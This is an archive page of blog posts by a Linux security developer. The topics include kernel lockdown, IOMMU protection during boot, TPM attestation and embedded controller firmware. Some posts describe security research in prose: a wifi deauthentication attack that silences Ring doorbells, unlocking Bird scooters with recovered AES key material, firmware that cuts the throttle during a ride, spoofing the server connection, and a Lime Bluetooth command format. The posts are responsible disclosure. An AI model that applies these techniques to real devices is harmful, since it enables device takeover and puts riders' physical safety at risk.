Tag Archives: fedora

Making my doorbell work

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/55312.html

I recently moved house, and the new building has a Doorbird to act as a doorbell and open the entrance gate for people. There’s a documented local control API (no cloud dependency!) and a Home Assistant integration, so this seemed pretty straightforward.

Unfortunately not. The Doorbird is on separate network that’s shared across the building, provided by Moneybrains. We’re also a Monkeybrains customer, so our network connection is plugged into the same router and antenna as the Doorbird one. And, as is common, there’s port isolation between the networks in order to avoid leakage of information between customers. Rather perversely, we are the only people with an internet connection who are unable to ping my doorbell.

I spent most of the past few weeks digging myself out from under a pile of boxes, but we’d finally reached the point where spending some time figuring out a solution to this seemed reasonable. I spent a while playing with port forwarding, but that wasn’t ideal – the only server I run is in the UK, and having packets round trip almost 11,000 miles so I could speak to something a few metres away seemed like a bad plan. Then I tried tethering an old Android device with a data-only SIM, which worked fine but only in one direction (I could see what the doorbell could see, but I couldn’t get notifications that someone had pushed a button, which was kind of the point here).

So I went with the obvious solution – I added a wifi access point to the doorbell network, and my home automation machine now exists on two networks simultaneously (nmcli device modify wlan0 ipv4.never-default true is the magic for “ignore the gateway that the DHCP server gives you” if you want to avoid this), and I could now do link local service discovery to find the doorbell if it changed addresses after a power cut or anything. And then, like magic, everything worked – I got notifications from the doorbell when someone hit our button.

But knowing that an event occurred without actually doing something in response seems fairly unhelpful. I have a bunch of Chromecast targets around the house (a mixture of Google Home devices and Chromecast Audios), so just pushing a message to them seemed like the easiest approach. Home Assistant has a text to speech integration that can call out to various services to turn some text into a sample, and then push that to a media player on the local network. You can group multiple Chromecast audio sinks into a group that then presents as a separate device on the network, so I could then write an automation to push audio to the speaker group in response to the button being pressed.

That’s nice, but it’d also be nice to do something in response. The Doorbird exposes API control of the gate latch, and Home Assistant exposes that as a switch. I’m using Home Assistant’s Google Assistant integration to expose devices Home Assistant knows about to voice control. Which means when I get a house-wide notification that someone’s at the door I can just ask Google to open the door for them.

So. Someone pushes the doorbell. That sends a signal to a machine that’s bridged onto that network via an access point. That machine then sends a protobuf command to speakers on a separate network, asking them to stream a sample it’s providing. Those speakers call back to that machine, grab the sample and play it. At this point, multiple speakers in the house say “Someone is at the door”. I then say “Hey Google, activate the front gate” – the device I’m closest to picks this up and sends it to Google, where something turns my speech back into text. It then looks at my home structure data and realises that the “Front Gate” device is associated with my Home Assistant integration. It then calls out to the home automation machine that received the notification in the first place, asking it to trigger the front gate relay. That device calls out to the Doorbird and asks it to open the gate. And now I have functionality equivalent to a doorbell that completes a circuit and rings a bell inside my home, and a button inside my home that completes a circuit and opens the gate, except it involves two networks inside my building, callouts to the cloud, at least 7 devices inside my home that are running Linux and I really don’t want to know how many computational cycles.

The future is wonderful.

(I work for Google. I do not work on any of the products described in this post. Please god do not ask me how to integrate your IoT into any of this)

comment count unavailable comments

Linux kernel lockdown, integrity, and confidentiality

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/55105.html

The Linux kernel lockdown patches were merged into the 5.4 kernel last year, which means they’re now part of multiple distributions. For me this was a 7-year journey, which means it’s easy to forget that others aren’t as invested in the code as I am. Here’s what these patches are intended to achieve, why they’re implemented in the current form and what people should take into account when deploying the feature.

Root is a user – a privileged user, but nevertheless a user. Root is not identical to the kernel. Processes running as root still can’t dereference addresses that belong to the kernel, are still subject to the whims of the scheduler and so on. But historically that boundary has been very porous. Various interfaces make it straightforward for root to modify kernel code (such as loading modules or using /dev/mem), while others make it less straightforward (being able to load new ACPI tables that can cause the ACPI interpreter to overwrite the kernel, for instance). In the past that wasn’t seen as a significant issue, since there were no widely deployed mechanisms for verifying the integrity of the kernel in the first place. But once UEFI secure boot became widely deployed, this was a problem. If you verify your boot chain but allow root to modify that kernel, the benefits of the verified boot chain are significantly reduced. Even if root can’t modify the on-disk kernel, root can just hot-patch the kernel and then make this persistent by dropping a binary that repeats the process on system boot.

Lockdown is intended as a mechanism to avoid that, by providing an optional policy that closes off interfaces that allow root to modify the kernel. This was the sole purpose of the original implementation, which maps to the “integrity” mode that’s present in the current implementation. Kernels that boot in lockdown integrity mode prevent even root from using these interfaces, increasing assurances that the running kernel corresponds to the booted kernel. But lockdown’s functionality has been extended since then. There are some use cases where preventing root from being able to modify the kernel isn’t enough – the kernel may hold secret information that even root shouldn’t be permitted to see (such as the EVM signing key that can be used to prevent offline file modification), and the integrity mode doesn’t prevent that. This is where lockdown’s confidentiality mode comes in. Confidentiality mode is a superset of integrity mode, with additional restrictions on root’s ability to use features that would allow the inspection of any kernel memory that could contain secrets.

Unfortunately right now we don’t have strong mechanisms for marking which bits of kernel memory contain secrets, so in order to achieve that we end up blocking access to all kernel memory. Unsurprisingly, this compromises people’s ability to inspect the kernel for entirely legitimate reasons, such as using the various mechanisms that allow tracing and probing of the kernel.

How can we solve this? There’s a few ways:

  1. Introduce a mechanism to tag memory containing secrets, and only restrict accesses to this. I’ve tried to do something similar for userland and it turns out to be hard, but this is probably the best long-term solution.
  2. Add support for privileged applications with an appropriate signature that implement policy on the userland side. This is actually possible already, though not straightforward. Lockdown is implemented in the LSM layer, which means the policy can be imposed using any other existing LSM. As an example, we could use SELinux to impose the confidentiality restrictions on most processes but permit processes with a specific SELinux context to use them, and then use EVM to ensure that any process running in that context has a legitimate signature. This is quite a few hoops for a general purpose distribution to jump through.
  3. Don’t use confidentiality mode in general purpose distributions. The attacks it protects against are mostly against special-purpose use cases, and they can enable it themselves.

My recommendation is for (3), and I’d encourage general purpose distributions that enable lockdown to do so only in integrity mode rather than confidentiality mode. The cost of confidentiality mode is just too high compared to the benefits it provides. People who need confidentiality mode probably already know that they do, and should be in a position to enable it themselves and handle the consequences.

comment count unavailable comments

Implementing support for advanced DPTF policy in Linux

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/54923.html

Intel’s Dynamic Platform and Thermal Framework (DPTF) is a feature that’s becoming increasingly common on highly portable Intel-based devices. The adaptive policy it implements is based around the idea that thermal management of a system is becoming increasingly complicated – the appropriate set of cooling constraints to place on a system may differ based on a whole bunch of criteria (eg, if a tablet is being held vertically rather than lying on a table, it’s probably going to be able to dissipate heat more effectively, so you should impose different constraints). One way of providing these criteria to the OS is to embed them in the system firmware, allowing an OS-level agent to read that and then incorporate OS-level knowledge into a final policy decision.

Unfortunately, while Intel have released some amount of support for DPTF on Linux, they haven’t included support for the adaptive policy. And even more annoyingly, many modern laptops run in a heavily conservative thermal state if the OS doesn’t support the adaptive policy, meaning that the CPU throttles down extremely quickly and the laptop runs excessively slowly.

It’s been a while since I really got stuck into a laptop reverse engineering project, and I don’t have much else to do right now, so I’ve been working on this. It’s been a combination of examining what source Intel have released, reverse engineering the Windows code and staring hard at hex dumps until they made some sort of sense. Here’s where I am.

There’s two main components to the adaptive policy – the adaptive conditions table (APCT) and the adaptive actions table (APAT). The adaptive conditions table contains a set of condition sets, with up to 10 conditions in each condition set. A condition is something like “is the battery above a certain charge”, “is this temperature sensor below a certain value”, “is the lid open or closed”, “is the machine upright or horizontal” and so on. Each condition set is evaluated in turn – if all the conditions evaluate to true, the condition set’s target is implemented. If not, we move onto the next condition set. There will typically be a fallback condition set to catch the case where none of the other condition sets evaluate to true.

The action table contains sets of actions associated with a specific target. Once we’ve picked a target by evaluating the conditions, we execute the actions that have a corresponding target. Actions are things like “Set the CPU power limit to this value” or “Load a passive policy table”. Passive policy tables are simply tables associating sensors with devices and an associated temperature limit. If the limit is exceeded, the associated device should be asked to reduce its heat output until the situation is resolved.

There’s a couple of twists. The first is the OEM conditions. These are conditions that refer to values that are exposed by the firmware and are otherwise entirely opaque – the firmware knows what these mean, but we don’t, so conditions that rely on these values are magical. They could be temperature, they could be power consumption, they could be SKU variations. We just don’t know. The other is that older versions of the APCT table didn’t include a reference to a device – ie, if you specified a condition based on a temperature, you had no way to express which temperature sensor to use. So, instead, you specified a condition that’s greater than 0x10000, which tells the agent to look at the APPC table to extract the device and the appropriate actual condition.

Intel already have a Linux app called Thermal Daemon that implements a subset of this – you’re supposed to run the binary-only dptfxtract against your firmware to parse a few bits of the DPTF tables, and it writes out an XML file that Thermal Daemon makes use of. Unfortunately it doesn’t handle most of the more interesting bits of the adaptive performance policy, so I’ve spent the past couple of days extending it to do so and to remove the proprietary dependency.

My current work is here – it requires a couple of kernel patches (that are in the patches directory), and it only supports a very small subset of the possible conditions. It’s also entirely possible that it’ll do something inappropriate and cause your computer to melt – none of this is publicly documented, I don’t have access to the spec and you’re relying on my best guesses in a lot of places. But it seems to behave roughly as expected on the one test machine I have here, so time to get some wider testing?

comment count unavailable comments

What usage restrictions can we place in a free software license?

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/54709.html

Growing awareness of the wider social and political impact of software development has led to efforts to write licenses that prevent software being used to engage in acts that are seen as socially harmful, with the Hippocratic License being perhaps the most discussed example (although the JSON license‘s requirement that the software be used for good, not evil, is arguably an earlier version of the theme). The problem with these licenses is that they’re pretty much universally considered to fall outside the definition of free software or open source licenses due to their restrictions on use, and there’s a whole bunch of people who have very strong feelings that this is a very important thing. There’s also the more fundamental underlying point that it’s hard to write a license like this where everyone agrees on whether a specific thing is bad or not (eg, while many people working on a project may feel that it’s reasonable to prohibit the software being used to support drone strikes, others may feel that the project shouldn’t have a position on the use of the software to support drone strikes and some may even feel that some people should be the victims of drone strikes). This is, it turns out, all quite complicated.

But there is something that many (but not all) people in the free software community agree on – certain restrictions are legitimate if they ultimately provide more freedom. Traditionally this was limited to restrictions on distribution (eg, the GPL requires that your recipient be able to obtain corresponding source code, and for GPLv3 must also be able to obtain the necessary signing keys to be able to replace it in covered devices), but more recently there’s been some restrictions that don’t require distribution. The best known is probably the clause in the Affero GPL (or AGPL) that requires that users interacting with covered code over a network be able to download the source code, but the Cryptographic Autonomy License (recently approved as an Open Source license) goes further and requires that users be able to obtain their data in order to self-host an equivalent instance.

We can construct examples of where these prevent certain fields of endeavour, but the tradeoff has been deemed worth it – the benefits to user freedom that these licenses provide is greater than the corresponding cost to what you can do. How far can that tradeoff be pushed? So, here’s a thought experiment. What if we write a license that’s something like the following:

Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:

1. All permissions granted by this license must be passed on to all recipients of modified or unmodified versions of this work
2. This work may not be used in any way that impairs any individual's ability to exercise the permissions granted by this license, whether or not they have received a copy of the covered work

This feels like the logical extreme of the argument. Any way you could use the covered work that would restrict someone else’s ability to do the same is prohibited. This means that, for example, you couldn’t use the software to implement a DRM mechanism that the user couldn’t replace (along the lines of GPLv3’s anti-Tivoisation clause), but it would also mean that you couldn’t use the software to kill someone with a drone (doing so would impair their ability to make use of the software). The net effect is along the lines of the Hippocratic license, but it’s framed in a way that is focused on user freedom.

To be clear, I don’t think this is a good license – it has a bunch of unfortunate consequences like it being impossible to use covered code in self-defence if doing so would impair your attacker’s ability to use the software. I’m not advocating this as a solution to anything. But I am interested in seeing whether the perception of the argument changes when we refocus it on user freedom as opposed to an independent ethical goal.

Thoughts?

Edit:

Rich Felker on Twitter had an interesting thought – if clause 2 above is replaced with:

2. Your rights under this license terminate if you impair any individual's ability to exercise the permissions granted by this license, even if the covered work is not used to do so

how does that change things? My gut feeling is that covering actions that are unrelated to the use of the software might be a reach too far, but it gets away from the idea that it’s your use of the software that triggers the clause.

comment count unavailable comments

Avoiding gaps in IOMMU protection at boot

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/54433.html

When you save a large file to disk or upload a large texture to your graphics card, you probably don’t want your CPU to sit there spending an extended period of time copying data between system memory and the relevant peripheral – it could be doing something more useful instead. As a result, most hardware that deals with large quantities of data is capable of Direct Memory Access (or DMA). DMA-capable devices are able to access system memory directly without the aid of the CPU – the CPU simply tells the device which region of memory to copy and then leaves it to get on with things. However, we also need to get data back to system memory, so DMA is bidirectional. This means that DMA-capable devices are able to read and write directly to system memory.

As long as devices are entirely under the control of the OS, this seems fine. However, this isn’t always true – there may be bugs, the device may be passed through to a guest VM (and so no longer under the control of the host OS) or the device may be running firmware that makes it actively malicious. The third is an important point here – while we usually think of DMA as something that has to be set up by the OS, at a technical level the transactions are initiated by the device. A device that’s running hostile firmware is entirely capable of choosing what and where to DMA.

Most reasonably recent hardware includes an IOMMU to handle this. The CPU’s MMU exists to define which regions of memory a process can read or write – the IOMMU does the same but for external IO devices. An operating system that knows how to use the IOMMU can allocate specific regions of memory that a device can DMA to or from, and any attempt to access memory outside those regions will fail. This was originally intended to handle passing devices through to guests (the host can protect itself by restricting any DMA to memory belonging to the guest – if the guest tries to read or write to memory belonging to the host, the attempt will fail), but is just as relevant to preventing malicious devices from extracting secrets from your OS or even modifying the runtime state of the OS.

But setting things up in the OS isn’t sufficient. If an attacker is able to trigger arbitrary DMA before the OS has started then they can tamper with the system firmware or your bootloader and modify the kernel before it even starts running. So ideally you want your firmware to set up the IOMMU before it even enables any external devices, and newer firmware should actually do this automatically. It sounds like the problem is solved.

Except there’s a problem. Not all operating systems know how to program the IOMMU, and if a naive OS fails to remove the IOMMU mappings and asks a device to DMA to an address that the IOMMU doesn’t grant access to then things are likely to explode messily. EFI has an explicit transition between the boot environment and the runtime environment triggered when the OS or bootloader calls ExitBootServices(). Various EFI components have registered callbacks that are triggered at this point, and the IOMMU driver will (in general) then tear down the IOMMU mappings before passing control to the OS. If the OS is IOMMU aware it’ll then program new mappings, but there’s a brief window where the IOMMU protection is missing – and a sufficiently malicious device could take advantage of that.

The ideal solution would be a protocol that allowed the OS to indicate to the firmware that it supported this functionality and request that the firmware not remove it, but in the absence of such a protocol we’re left with non-ideal solutions. One is to prevent devices from being able to DMA in the first place, which means the absence of any IOMMU restrictions is largely irrelevant. Every PCI device has a busmaster bit – if the busmaster bit is disabled, the device shouldn’t start any DMA transactions. Clearing that seems like a straightforward approach. Unfortunately this bit is under the control of the device itself, so a malicious device can just ignore this and do DMA anyway. Fortunately, PCI bridges and PCIe root ports should only forward DMA transactions if their busmaster bit is set. If we clear that then any devices downstream of the bridge or port shouldn’t be able to DMA, no matter how malicious they are. Linux will only re-enable the bit after it’s done IOMMU setup, so we should then be in a much more secure state – we still need to trust that our motherboard chipset isn’t malicious, but we don’t need to trust individual third party PCI devices.

This patch just got merged, adding support for this. My original version did nothing other than clear the bits on bridge devices, but this did have the potential for breaking devices that were still carrying out DMA at the moment this code ran. Ard modified it to call the driver shutdown code for each device behind a bridge before disabling DMA on the bridge, which in theory makes this safe but does still depend on the firmware drivers behaving correctly. As a result it’s not enabled by default – you can either turn it on in kernel config or pass the efi=disable_early_pci_dma kernel command line argument.

In combination with firmware that does the right thing, this should ensure that Linux systems can be protected against malicious PCI devices throughout the entire boot process.

comment count unavailable comments

Verifying your system state in a secure and private way

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/54203.html

Most modern PCs have a Trusted Platform Module (TPM) and firmware that, together, support something called Trusted Boot. In Trusted Boot, each component in the boot chain generates a series of measurements of next component of the boot process and relevant configuration. These measurements are pushed to the TPM where they’re combined with the existing values stored in a series of Platform Configuration Registers (PCRs) in such a way that the final PCR value depends on both the value and the order of the measurements it’s given. If any measurements change, the final PCR value changes.

Windows takes advantage of this with its Bitlocker disk encryption technology. The disk encryption key is stored in the TPM along with a policy that tells it to release it only if a specific set of PCR values is correct. By default, the TPM will release the encryption key automatically if the PCR values match and the system will just transparently boot. If someone tampers with the boot process or configuration, the PCR values will no longer match and boot will halt to allow the user to provide the disk key in some other way.

Unfortunately the TPM keeps no record of how it got to a specific state. If the PCR values don’t match, that’s all we know – the TPM is unable to tell us what changed to result in this breakage. Fortunately, the system firmware maintains an event log as we go along. Each measurement that’s pushed to the TPM is accompanied by a new entry in the event log, containing not only the hash that was pushed to the TPM but also metadata that tells us what was measured and why. Since the algorithm the TPM uses to calculate the hash values is known, we can replay the same values from the event log and verify that we end up with the same final value that’s in the TPM. We can then examine the event log to see what changed.

Unfortunately, the event log is stored in unprotected system RAM. In order to be able to trust it we need to compare the values in the event log (which can be tampered with) with the values in the TPM (which are much harder to tamper with). Unfortunately if someone has tampered with the event log then they could also have tampered with the bits of the OS that are doing that comparison. Put simply, if the machine is in a potentially untrustworthy state, we can’t trust that machine to tell us anything about itself.

This is solved using a procedure called Remote Attestation. The TPM can be asked to provide a digital signature of the PCR values, and this can be passed to a remote system along with the event log. That remote system can then examine the event log, make sure it corresponds to the signed PCR values and make a security decision based on the contents of the event log rather than just on the final PCR values. This makes the system significantly more flexible and aids diagnostics. Unfortunately, it also means you need a remote server and an internet connection and then some way for that remote server to tell you whether it thinks your system is trustworthy and also you need some way to believe that the remote server is trustworthy and all of this is well not ideal if you’re not an enterprise.

Last week I gave a talk at linux.conf.au on one way around this. Basically, remote attestation places no constraints on the network protocol in use – while the implementations that exist all do this over IP, there’s no requirement for them to do so. So I wrote an implementation that runs over Bluetooth, in theory allowing you to use your phone to serve as the remote agent. If you trust your phone, you can use it as a tool for determining if you should trust your laptop.

I’ve pushed some code that demos this. The current implementation does nothing other than tell you whether UEFI Secure Boot was enabled or not, and it’s also not currently running on a phone. The phone bit of this is pretty straightforward to fix, but the rest is somewhat harder.

The big issue we face is that we frequently don’t know what event log values we should be seeing. The first few values are produced by the system firmware and there’s no standardised way to publish the expected values. The Linux Vendor Firmware Service has support for publishing these values, so for some systems we can get hold of this. But then you get to measurements of your bootloader and kernel, and those change every time you do an update. Ideally we’d have tooling for Linux distributions to publish known good values for each package version and for that to be common across distributions. This would allow tools to download metadata and verify that measurements correspond to legitimate builds from the distribution in question.

This does still leave the problem of the initramfs. Since initramfs files are usually generated locally, and depend on the locally installed versions of tools at the point they’re built, we end up with no good way to precalculate those values. I proposed a possible solution to this a while back, but have done absolutely nothing to help make that happen. I suck. The right way to do this may actually just be to turn initramfs images into pre-built artifacts and figure out the config at runtime (dracut actually supports a bunch of this already), so I’m going to spend a while playing with that.

If we can pull these pieces together then we can get to a place where you can boot your laptop and then, before typing any authentication details, have your phone compare each component in the boot process to expected values. Assistance in all of this extremely gratefully received.

comment count unavailable comments

Wifi deauthentication attacks and home security

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/53968.html

I live in a large apartment complex (it’s literally a city block big), so I spend a disproportionate amount of time walking down corridors. Recently one of my neighbours installed a Ring wireless doorbell. By default these are motion activated (and the process for disabling motion detection is far from obvious), and if the owner subscribes to an appropriate plan these recordings are stored in the cloud. I’m not super enthusiastic about the idea of having my conversations recorded while I’m walking past someone’s door, so I decided to look into the security of these devices.

One visit to Amazon later and I had a refurbished Ring Video Doorbell 2™ sitting on my desk. Tearing it down revealed it uses a TI SoC that’s optimised for this sort of application, linked to a DSP that presumably does stuff like motion detection. The device spends most of its time in a sleep state where it generates no network activity, so on any wakeup it has to reassociate with the wireless network and start streaming data.

So we have a device that’s silent and undetectable until it starts recording you, which isn’t a great place to start from. But fortunately wifi has a few, uh, interesting design choices that mean we can still do something. The first is that even on an encrypted network, the packet headers are unencrypted and contain the address of the access point and whichever device is communicating. This means that it’s possible to just dump whatever traffic is floating past and build up a collection of device addresses. Address ranges are allocated by the IEEE, so it’s possible to map the addresses you see to manufacturers and get some idea of what’s actually on the network[1] even if you can’t see what they’re actually transmitting. The second is that various management frames aren’t encrypted, and so can be faked even if you don’t have the network credentials.

The most interesting one here is the deauthentication frame that access points can use to tell clients that they’re no longer welcome. These can be sent for a variety of reasons, including resource exhaustion or authentication failure. And, by default, they’re entirely unprotected. Anyone can inject such a frame into your network and cause clients to believe they’re no longer authorised to use the network, at which point they’ll have to go through a new authentication cycle – and while they’re doing that, they’re not able to send any other packets.

So, the attack is to simply monitor the network for any devices that fall into the address range you want to target, and then immediately start shooting deauthentication frames at them once you see one. I hacked airodump-ng to ignore all clients that didn’t look like a Ring, and then pasted in code from aireplay-ng to send deauthentication packets once it saw one. The problem here is that wifi cards can only be tuned to one frequency at a time, so unless you know the channel your potential target is on, you need to keep jumping between frequencies while looking for a target – and that means a target can potentially shoot off a notification while you’re looking at other frequencies.

But even with that proviso, this seems to work reasonably reliably. I can hit the button on my Ring, see it show up in my hacked up code and see my phone receive no push notification. Even if it does get a notification, the doorbell is no longer accessible by the time I respond.

There’s a couple of ways to avoid this attack. The first is to use 802.11w which protects management frames. A lot of hardware supports this, but it’s generally disabled by default. The second is to just ignore deauthentication frames in the first place, which is a spec violation but also you’re already building a device that exists to record strangers engaging in a range of legal activities so paying attention to social norms is clearly not a priority in any case.

Finally, none of this is even slightly new. A presentation from Def Con in 2016 covered this, demonstrating that Nest cameras could be blocked in the same way. The industry doesn’t seem to have learned from this.

[1] The Ring Video Doorbell 2 just uses addresses from TI’s range rather than anything Ring specific, unfortunately

comment count unavailable comments

Extending proprietary PC embedded controller firmware

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/53703.html

I’m still playing with my X210, a device that just keeps coming up with new ways to teach me things. I’m now running Coreboot full time, so the majority of the runtime platform firmware is free software. Unfortunately, the firmware that’s running on the embedded controller (a separate chip that’s awake even when the rest of the system is asleep and which handles stuff like fan control, battery charging, transitioning into different power states and so on) is proprietary and the manufacturer of the chip won’t release data sheets for it. This was disappointing, because the stock EC firmware is kind of annoying (there’s no hysteresis on the fan control, so it hits a threshold, speeds up, drops below the threshold, turns off, and repeats every few seconds – also, a bunch of the Thinkpad hotkeys don’t do anything) and it would be nice to be able to improve it.

A few months ago someone posted a bunch of fixes, a Ghidra project and a kernel patch that lets you overwrite the EC’s code at runtime for purposes of experimentation. This seemed promising. Some amount of playing later and I’d produced a patch that generated keyboard scancodes for all the missing hotkeys, and I could then use udev to map those scancodes to the keycodes that the thinkpad_acpi driver would generate. I finally had a hotkey to tell me how much battery I had left.

But something else included in that post was a list of the GPIO mappings on the EC. A whole bunch of hardware on the board is connected to the EC in ways that allow it to control them, including things like disabling the backlight or switching the wifi card to airplane mode. Unfortunately the ACPI spec doesn’t cover how to control GPIO lines attached to the embedded controller – the only real way we have to communicate is via a set of registers that the EC firmware interprets and does stuff with.

One of those registers in the vendor firmware for the X210 looked promising, with individual bits that looked like radio control. Unfortunately writing to them does nothing – the EC firmware simply stashes that write in an address and returns it on read without parsing the bits in any way. Doing anything more with them was going to involve modifying the embedded controller code.

Thankfully the EC has 64K of firmware and is only using about 40K of that, so there’s plenty of room to add new code. The problem was generating the code in the first place and then getting it called. The EC is based on the CR16C architecture, which binutils supported until 10 days ago. To be fair it didn’t appear to actually work, and binutils still has support for the more generic version of the CR16 family, so I built a cross assembler, wrote some assembly and came up with something that Ghidra was willing to parse except for one thing.

As mentioned previously, the existing firmware code responded to writes to this register by saving it to its RAM. My plan was to stick my new code in unused space at the end of the firmware, including code that duplicated the firmware’s existing functionality. I could then replace the existing code that stored the register value with code that branched to my code, did whatever I wanted and then branched back to the original code. I hacked together some assembly that did the right thing in the most brute force way possible, but while Ghidra was happy with most of the code it wasn’t happy with the instruction that branched from the original code to the new code, or the instruction at the end that returned to the original code. The branch instruction differs from a jump instruction in that it gives a relative offset rather than an absolute address, which means that branching to nearby code can be encoded in fewer bytes than going further. I was specifying the longest jump encoding possible in my assembly (that’s what the :l means), but the linker was rewriting that to a shorter one. Ghidra was interpreting the shorter branch as a negative offset, and it wasn’t clear to me whether this was a binutils bug or a Ghidra bug. I ended up just hacking that code out of binutils so it generated code that Ghidra was happy with and got on with life.

Writing values directly to that EC register showed that it worked, which meant I could add an ACPI device that exposed the functionality to the OS. My goal here is to produce a standard Coreboot radio control device that other Coreboot platforms can implement, and then just write a single driver that exposes it. I wrote one for Linux that seems to work.

In summary: closed-source code is more annoying to improve, but that doesn’t mean it’s impossible. Also, strange Russians on forums make everything easier.

comment count unavailable comments

Letting Birds scooters fly free

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/53258.html

(Note: These issues were disclosed to Bird, and they tell me that fixes have rolled out. I haven’t independently verified)

Bird produce a range of rental scooters that are available in multiple markets. With the exception of the Bird Zero[1], all their scooters share a common control board described in FCC filings. The board contains three primary components – a Nordic NRF52 Bluetooth controller, an STM32 SoC and a Quectel EC21-V modem. The Bluetooth and modem are both attached to the STM32 over serial and have no direct control over the rest of the scooter. The STM32 is tied to the scooter’s engine control unit and lights, and also receives input from the throttle (and, on some scooters, the brakes).

The pads labeled TP7-TP11 near the underside of the STM32 and the pads labeled TP1-TP5 near the underside of the NRF52 provide Serial Wire Debug, although confusingly the data and clock pins are the opposite way around between the STM and the NRF. Hooking this up via an STLink and using OpenOCD allows dumping of the firmware from both chips, which is where the fun begins. Running strings over the firmware from the STM32 revealed “Set mode to Free Drive Mode”. Challenge accepted.

Working back from the code that printed that, it was clear that commands could be delivered to the STM from the Bluetooth controller. The Nordic NRF52 parts are an interesting design – like the STM, they have an ARM Cortex-M microcontroller core. Their firmware is split into two halves, one the low level Bluetooth code and the other application code. They provide an SDK for writing the application code, and working through Ghidra made it clear that the majority of the application firmware on this chip was just SDK code. That made it easier to find the actual functionality, which was just listening for writes to a specific BLE attribute and then hitting a switch statement depending on what was sent. Most of these commands just got passed over the wire to the STM, so it seemed simple enough to just send the “Free drive mode” command to the Bluetooth controller, have it pass that on to the STM and win. Obviously, though, things weren’t so easy.

It turned out that passing most of the interesting commands on to the STM was conditional on a variable being set, and the code path that hit that variable had some impressively complicated looking code. Fortunately, I got lucky – the code referenced a bunch of data, and searching for some of the values in that data revealed that they were the AES S-box values. Enabling the full set of commands required you to send an encrypted command to the scooter, which would then decrypt it and verify that the cleartext contained a specific value. Implementing this would be straightforward as long as I knew the key.

Most AES keys are 128 bits, or 16 bytes. Digging through the code revealed 8 bytes worth of key fairly quickly, but the other 8 bytes were less obvious. I finally figured out that 4 more bytes were the value of another Bluetooth variable which could be simply read out by a client. The final 4 bytes were more confusing, because all the evidence made no sense. It looked like it came from passing the scooter serial number to atoi(), which converts an ASCII representation of a number to an integer. But this seemed wrong, because atoi() stops at the first non-numeric value and the scooter serial numbers all started with a letter[2]. It turned out that I was overthinking it and for the vast majority of scooters in the fleet, this section of the key was always “0”.

At that point I had everything I need to write a simple app to unlock the scooters, and it worked! For about 2 minutes, at which point the network would notice that the scooter was unlocked when it should be locked and sent a lock command to force disable the scooter again. Ah well.

So, what else could I do? The next thing I tried was just modifying some STM firmware and flashing it onto a board. It still booted, indicating that there was no sort of verified boot process. Remember what I mentioned about the throttle being hooked through the STM32’s analogue to digital converters[3]? A bit of hacking later and I had a board that would appear to work normally, but about a minute after starting the ride would cut the throttle. Alternative options are left as an exercise for the reader.

Finally, there was the component I hadn’t really looked at yet. The Quectel modem actually contains its own application processor that runs Linux, making it significantly more powerful than any of the chips actually running the scooter application[4]. The STM communicates with the modem over serial, sending it an AT command asking it to make an SSL connection to a remote endpoint. It then uses further AT commands to send data over this SSL connection, allowing it to talk to the internet without having any sort of IP stack. Figuring out just what was going over this connection was made slightly difficult by virtue of all the debug functionality having been ripped out of the STM’s firmware, so in the end I took a more brute force approach – I identified the address of the function that sends data to the modem, hooked up OpenOCD to the SWD pins on the STM, ran OpenOCD’s gdb stub, attached gdb, set a breakpoint for that function and then dumped the arguments being passed to that function. A couple of minutes later and I had a full transaction between the scooter and the remote.

The scooter authenticates against the remote endpoint by sending its serial number and IMEI. You need to send both, but the IMEI didn’t seem to need to be associated with the serial number at all. New connections seemed to take precedence over existing connections, so it would be simple to just pretend to be every scooter and hijack all the connections, resulting in scooter unlock commands being sent to you rather than to the scooter or allowing someone to send fake GPS data and make it impossible for users to find scooters.

In summary: Secrets that are stored on hardware that attackers can run arbitrary code on probably aren’t secret, not having verified boot on safety critical components isn’t ideal, devices should have meaningful cryptographic identity when authenticating against a remote endpoint.

Bird responded quickly to my reports, accepted my 90 day disclosure period and didn’t threaten to sue me at any point in the process, so good work Bird.

(Hey scooter companies I will absolutely accept gifts of interesting hardware in return for a cursory security audit)

[1] And some very early M365 scooters
[2] The M365 scooters that Bird originally deployed did have numeric serial numbers, but they were 6 characters of type code followed by a / followed by the actual serial number – the number of type codes was very constrained and atoi() would terminate at the / so this was still not a large keyspace
[3] Interestingly, Lime made a different design choice here and plumb the controls directly through to the engine control unit without the application processor having any involvement
[4] Lime run their entire software stack on the modem’s application processor, but because of [3] they don’t have any realtime requirements so this is more straightforward

comment count unavailable comments

Investigating the security of Lime scooters

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/53024.html

(Note: to be clear, this vulnerability does not exist in the current version of the software on these scooters. Also, this is not the topic of my Kawaiicon talk.)

I’ve been looking at the security of the Lime escooters. These caught my attention because:
(1) There’s a whole bunch of them outside my building, and
(2) I can see them via Bluetooth from my sofa
which, given that I’m extremely lazy, made them more attractive targets than something that would actually require me to leave my home. I did some digging. Limes run Linux and have a single running app that’s responsible for scooter management. They have an internal debug port that exposes USB and which, until this happened, ran adb (as root!) over this USB. As a result, there’s a fair amount of information available in various places, which made it easier to start figuring out how they work.

The obvious attack surface is Bluetooth (Limes have wifi, but only appear to use it to upload lists of nearby wifi networks, presumably for geolocation if they can’t get a GPS fix). Each Lime broadcasts its name as Lime-12345678 where 12345678 is 8 digits of hex. They implement Bluetooth Low Energy and expose a custom service with various attributes. One of these attributes (0x35 on at least some of them) sends Bluetooth traffic to the application processor, which then parses it. This is where things get a little more interesting. The app has a core event loop that can take commands from multiple sources and then makes a decision about which component to dispatch them to. Each command is of the following form:

AT+type,password,time,sequence,data$

where type is one of either ATH, QRY, CMD or DBG. The password is a TOTP derived from the IMEI of the scooter, the time is simply the current date and time of day, the sequence is a monotonically increasing counter and the data is a blob of JSON. The command is terminated with a $ sign. The code is fairly agnostic about where the command came from, which means that you can send the same commands over Bluetooth as you can over the cellular network that the Limes are connected to. Since locking and unlocking is triggered by one of these commands being sent over the network, it ought to be possible to do the same by pushing a command over Bluetooth.

